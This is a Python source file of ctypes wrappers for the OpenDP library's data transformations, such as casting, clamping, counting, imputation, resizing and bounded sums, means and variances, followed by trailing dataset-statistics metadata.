:param TIA: atomic input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: atomic data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast_default step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_default
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
def make_is_equal(
value: Any,
TIA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that checks if each element is equal to `value`.
:param value: value to check against
:type value: Any
:param TIA: atomic input data type
:type TIA: RuntimeTypeDescriptor
:return: An is_equal step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse_or_infer(type_name=TIA, public_example=value)
# Convert arguments to c types.
value = py_to_c(value, c_type=AnyObjectPtr, type_name=TIA)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_is_equal
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(value, TIA), Transformation))
def make_is_null(
DIA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that checks if each element in a vector is null.
:param DIA: atomic input domain
:type DIA: RuntimeTypeDescriptor
:return: An is_null step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
DIA = RuntimeType.parse(type_name=DIA)
# Convert arguments to c types.
DIA = py_to_c(DIA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_is_null
function.argtypes = [ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(DIA), Transformation))
def make_cast_inherent(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TI` to a type that can represent nullity `TO`.
If cast fails, fill with `TO`'s null value.
:param TIA: input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast_inherent step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_inherent
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
def make_cast_metric(
MI: DatasetMetric,
MO: DatasetMetric,
TA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that converts the dataset metric from type `MI` to type `MO`.
:param MI: input dataset metric
:type MI: DatasetMetric
:param MO: output dataset metric
:type MO: DatasetMetric
:param TA: atomic type of data
:type TA: RuntimeTypeDescriptor
:return: A cast_metric step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MI = RuntimeType.parse(type_name=MI)
MO = RuntimeType.parse(type_name=MO)
TA = RuntimeType.parse(type_name=TA)
# Convert arguments to c types.
MI = py_to_c(MI, c_type=ctypes.c_char_p)
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_metric
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(MI, MO, TA), Transformation))
def make_clamp(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that clamps numeric data in Vec<`T`> to `bounds`.
If datum is less than lower, let datum be lower.
If datum is greater than upper, let datum be upper.
:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: atomic data type
:type TA: RuntimeTypeDescriptor
:return: A clamp step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_clamp
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
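# Example (editorial sketch, same assumptions as the make_cast example above):
#   clamper = make_clamp(bounds=(0., 10.))
#   clamper([-2.5, 3.0, 22.0])   # -> [0.0, 3.0, 10.0]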
def make_unclamp(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that unclamps a VectorDomain<BoundedDomain<T>> to a VectorDomain<AllDomain<T>>.
:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: atomic data type
:type TA: RuntimeTypeDescriptor
:return: An unclamp step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_unclamp
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
def make_count(
TIA: RuntimeTypeDescriptor,
TO: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes a count of the number of records in data.
:param TIA: Atomic Input Type. Input data is expected to be of the form Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TO: Output Type. Must be an integer.
:type TO: RuntimeTypeDescriptor
:return: A count step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TO = RuntimeType.parse(type_name=TO)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TO = py_to_c(TO, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TO), Transformation))
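# Example (editorial sketch, same assumptions as above):
#   counter = make_count(TIA="i32")
#   counter([1, 2, 3, 4])   # -> 4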
def make_count_distinct(
TIA: RuntimeTypeDescriptor,
TO: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes a count of the number of unique, distinct records in data.
:param TIA: Atomic Input Type. Input data is expected to be of the form Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TO: Output Type. Must be an integer.
:type TO: RuntimeTypeDescriptor
:return: A count_distinct step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TO = RuntimeType.parse(type_name=TO)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TO = py_to_c(TO, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_distinct
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TO), Transformation))
def make_count_by(
size: int,
MO: SensitivityMetric,
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes the count of each unique value in data.
This assumes that the category set is unknown.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_resize` to establish dataset size.
Use meas.make_base_stability to release this query.
:param size: Number of records in input data.
:type size: int
:param MO: Output Metric.
:type MO: SensitivityMetric
:param TIA: Atomic Input Type. Categorical/hashable input data type. Input data must be Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TOA: Atomic Output Type. Express counts in terms of this integral type.
:type TOA: RuntimeTypeDescriptor
:return: The carrier type is HashMap<TIA, TOA>: the count for each unique input value.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MO = RuntimeType.parse(type_name=MO)
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_by
function.argtypes = [ctypes.c_uint, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, MO, TIA, TOA), Transformation))
def make_count_by_categories(
categories: Any,
MO: SensitivityMetric = "L1Distance<i32>",
TIA: RuntimeTypeDescriptor = None,
TOA: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes the number of times each category appears in the data.
This assumes that the category set is known.
:param categories: The set of categories to compute counts for.
:type categories: Any
:param MO: output sensitivity metric
:type MO: SensitivityMetric
:param TIA: categorical/hashable input type. Input data must be Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TOA: express counts in terms of this integral type
:type TOA: RuntimeTypeDescriptor
:return: A count_by_categories step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MO = RuntimeType.parse(type_name=MO)
TIA = RuntimeType.parse_or_infer(type_name=TIA, public_example=next(iter(categories), None))
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
categories = py_to_c(categories, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[TIA]))
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_by_categories
function.argtypes = [AnyObjectPtr, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(categories, MO, TIA, TOA), Transformation))
def make_split_lines(
) -> Transformation:
"""Make a Transformation that takes a string and splits it into a Vec<String> of its lines.
:return: A split_lines step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# No type arguments to standardize.
# No arguments to convert to c types.
# Call library function.
function = lib.opendp_trans__make_split_lines
function.argtypes = []
function.restype = FfiResult
return c_to_py(unwrap(function(), Transformation))
def make_split_records(
separator: str
) -> Transformation:
"""Make a Transformation that splits each record in a Vec<String> into a Vec<Vec<String>>.
:param separator: The token(s) that separate entries in each record.
:type separator: str
:return: A split_records step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# No type arguments to standardize.
# Convert arguments to c types.
separator = py_to_c(separator, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_split_records
function.argtypes = [ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(separator), Transformation))
def make_create_dataframe(
col_names: Any,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that constructs a dataframe from a Vec<Vec<String>>.
:param col_names: Column names for each record entry.
:type col_names: Any
:param K: categorical/hashable data type of column names
:type K: RuntimeTypeDescriptor
:return: A create_dataframe step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=next(iter(col_names), None))
# Convert arguments to c types.
col_names = py_to_c(col_names, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[K]))
K = py_to_c(K, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_create_dataframe
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(col_names, K), Transformation))
def make_split_dataframe(
separator: str,
col_names: Any,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that splits each record in a String into a Vec<Vec<String>>,
and loads the resulting table into a dataframe keyed by `col_names`.
:param separator: The token(s) that separate entries in each record.
:type separator: str
:param col_names: Column names for each record entry.
:type col_names: Any
:param K: categorical/hashable data type of column names
:type K: RuntimeTypeDescriptor
:return: A split_dataframe step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=next(iter(col_names), None))
# Convert arguments to c types.
separator = py_to_c(separator, c_type=ctypes.c_char_p)
col_names = py_to_c(col_names, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[K]))
K = py_to_c(K, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_split_dataframe
function.argtypes = [ctypes.c_char_p, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(separator, col_names, K), Transformation))
def make_select_column(
key: Any,
TOA: RuntimeTypeDescriptor,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that retrieves the column `key` from a dataframe as Vec<`TOA`>.
:param key: name of the column to retrieve (a categorical/hashable value)
:type key: Any
:param K: data type of the key
:type K: RuntimeTypeDescriptor
:param TOA: atomic data type to downcast to
:type TOA: RuntimeTypeDescriptor
:return: A select_column step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=key)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
key = py_to_c(key, c_type=AnyObjectPtr, type_name=K)
K = py_to_c(K, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_select_column
function.argtypes = [AnyObjectPtr, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(key, K, TOA), Transformation))
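# Example (editorial sketch): a small preprocessing chain. The ">>" operator is
# assumed to compose transformations, as in OpenDP releases contemporary with
# this module.
#   load_col_A = (
#       make_split_dataframe(separator=",", col_names=["A", "B"]) >>
#       make_select_column(key="A", TOA="String")
#   )
#   load_col_A("1,1.0\n2,2.0\n3,3.0")   # -> ["1", "2", "3"]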
def make_identity(
D: RuntimeTypeDescriptor,
M: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that simply passes the data through.
:param D: Domain of the identity function. Must be VectorDomain<AllDomain<_>> or AllDomain<_>
:type D: RuntimeTypeDescriptor
:param M: metric. Must be a dataset metric if D is a VectorDomain or a sensitivity metric if D is an AllDomain
:type M: RuntimeTypeDescriptor
:return: A transformation where the input and output domain are D and the input and output metric are M
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
D = RuntimeType.parse(type_name=D)
M = RuntimeType.parse(type_name=M)
# Convert arguments to c types.
D = py_to_c(D, c_type=ctypes.c_char_p)
M = py_to_c(M, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_identity
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(D, M), Transformation))
def make_impute_constant(
constant: Any,
DA: RuntimeTypeDescriptor = "OptionNullDomain<AllDomain<TA>>"
) -> Transformation:
"""Make a Transformation that replaces null/None data with `constant`.
By default, the input type is Vec<Option<TA>>, as emitted by make_cast.
Set `DA` to InherentNullDomain<AllDomain<TA>> for imputing on types that have an inherent representation of nullity, like floats.
:param constant: Value to replace nulls with.
:type constant: Any
:param DA: domain of data being imputed. This is OptionNullDomain<AllDomain<TA>> or InherentNullDomain<AllDomain<TA>>
:type DA: RuntimeTypeDescriptor
:return: An impute_constant step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
DA = RuntimeType.parse(type_name=DA, generics=["TA"])
TA = get_domain_atom_or_infer(DA, constant)
DA = DA.substitute(TA=TA)
# Convert arguments to c types.
constant = py_to_c(constant, c_type=AnyObjectPtr, type_name=TA)
DA = py_to_c(DA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_impute_constant
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(constant, DA), Transformation))
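# Example (editorial sketch): impute after a fallible cast, so downstream steps
# see Vec<f64> instead of Vec<Option<f64>>.
#   cast_and_impute = make_cast(TIA="String", TOA="f64") >> make_impute_constant(constant=0.0)
#   cast_and_impute(["1.5", "oops", "2.5"])   # -> [1.5, 0.0, 2.5]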
def make_impute_uniform_float(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that replaces null/None data in Vec<`TA`> with uniformly distributed floats within `bounds`.
:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: type of data being imputed
:type TA: RuntimeTypeDescriptor
:return: An impute_uniform_float step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_impute_uniform_float
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
def make_sized_bounded_mean(
size: int,
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the mean of bounded data.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of inclusive lower and upper bounds of the input data.
:type bounds: Tuple[Any, Any]
:param T: atomic data type
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_mean step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_mean
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, T), Transformation))
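# Example (editorial sketch): a typical clamp/resize/mean chain. Whether these
# particular domains and metrics chain cleanly depends on the library version,
# so treat this as a sketch rather than a guarantee.
#   mean_chain = (
#       make_clamp(bounds=(0., 10.)) >>
#       make_bounded_resize(size=5, bounds=(0., 10.), constant=0.) >>
#       make_sized_bounded_mean(size=5, bounds=(0., 10.))
#   )
#   mean_chain([1., 2., 3., 4., 5.])   # -> 3.0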
def make_resize(
size: int,
constant: Any,
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that either truncates or imputes records with `constant` in a Vec<`TA`> to match a provided `size`.
:param size: Number of records in output data.
:type size: int
:param constant: Value to impute with.
:type constant: Any
:param TA: Atomic type.
:type TA: RuntimeTypeDescriptor
:return: A vector of the same type `TA`, but with the provided `size`.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=constant)
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
constant = py_to_c(constant, c_type=AnyObjectPtr, type_name=TA)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_resize
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, constant, TA), Transformation))
def make_bounded_resize(
size: int,
bounds: Tuple[Any, Any],
constant,
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that either truncates or imputes records with `constant` in a Vec<`TA`> to match a provided `size`.
:param size: Number of records in output data.
:type size: int
:param bounds: Tuple of lower and upper bounds for data in the input domain
:type bounds: Tuple[Any, Any]
:param constant: Value to impute with.
:param TA: Atomic type. If not passed, TA is inferred from the lower bound.
:type TA: RuntimeTypeDescriptor
:return: A vector of the same type `TA`, but with the provided `size`.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
constant = py_to_c(constant, c_type=ctypes.c_void_p, type_name=TA)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_bounded_resize
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_void_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, constant, TA), Transformation))
def make_bounded_sum(
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the sum of bounded data.
Use `make_clamp` to bound data.
:param bounds: Tuple of lower and upper bounds for data in the input domain
:type bounds: Tuple[Any, Any]
:param T: atomic type of data
:type T: RuntimeTypeDescriptor
:return: A bounded_sum step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_bounded_sum
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, T), Transformation))
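# Example (editorial sketch, same assumptions as above):
#   bounded_sum = make_clamp(bounds=(0., 5.)) >> make_bounded_sum(bounds=(0., 5.))
#   bounded_sum([1.0, 2.0, 9.0])   # -> 8.0 (9.0 is clamped to 5.0 first)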
def make_sized_bounded_sum(
size: int,
bounds: Tuple[Any, Any],
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the sum of bounded data with known dataset size.
This uses a restricted-sensitivity proof that takes advantage of known dataset size for better utility.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of lower and upper bounds for input data
:type bounds: Tuple[Any, Any]
:param T: atomic type of data
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_sum step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_sum
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, T), Transformation))
def make_sized_bounded_variance(
size: int,
bounds: Tuple[Any, Any],
ddof: int = 1,
T: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that computes the variance of bounded data.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_clamp` to bound data and `make_bounded_resize` to establish dataset size.
:param size: Number of records in input data.
:type size: int
:param bounds: Tuple of lower and upper bounds for input data
:type bounds: Tuple[Any, Any]
:param ddof: Delta degrees of freedom. Set to 0 if not a sample, 1 for sample estimate.
:type ddof: int
:param T: atomic data type
:type T: RuntimeTypeDescriptor
:return: A sized_bounded_variance step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
T = RuntimeType.parse_or_infer(type_name=T, public_example=get_first(bounds))
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[T, T]))
ddof = py_to_c(ddof, c_type=ctypes.c_uint)
T = py_to_c(T, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_sized_bounded_variance
function.argtypes = [ctypes.c_uint, AnyObjectPtr, ctypes.c_uint, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, bounds, ddof, T), Transformation))
| 37.587747
| 133
| 0.714755
| 4,945
| 36,197
| 5.062892
| 0.056218
| 0.026282
| 0.034271
| 0.037386
| 0.838113
| 0.815386
| 0.780756
| 0.774285
| 0.767135
| 0.75012
| 0
| 0.000486
| 0.204161
| 36,197
| 962
| 134
| 37.626819
| 0.868608
| 0.487969
| 0
| 0.604775
| 1
| 0
| 0.04312
| 0.010177
| 0
| 0
| 0
| 0
| 0.068966
| 1
| 0.068966
| false
| 0
| 0.01061
| 0
| 0.148541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd3f7a9c4c4dd723f01f9dd16031296ff374b03d
| 10,664
|
py
|
Python
|
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 7
|
2018-04-03T06:37:42.000Z
|
2021-11-08T11:44:06.000Z
|
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | null | null | null |
src/putils/findDiagonal/testRotation.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 3
|
2016-10-27T20:23:34.000Z
|
